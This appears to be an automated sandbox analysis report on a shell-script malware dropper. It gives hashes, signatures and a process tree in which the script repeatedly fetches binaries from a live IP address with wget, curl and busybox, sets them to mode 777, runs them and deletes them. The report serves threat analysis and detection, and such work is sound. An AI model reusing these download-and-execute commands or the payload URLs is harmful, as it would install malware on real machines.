Analysis
-
max time kernel
125s -
max time network
127s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Processes:
File opened for reading /proc/sys/crypto/fips_enabled (curl)
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:718
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:739
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:746
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:750
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:771
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:781
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:782
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:801
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:809
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:823
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:832
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:833
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:848
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:855
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:860
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:866
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:872
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:878
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:884
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:890
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:898
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:902
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:908
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:914
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:920
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:926
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:932
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:938
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:944
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:950
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:956
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:964
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:968
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:974
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:980
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97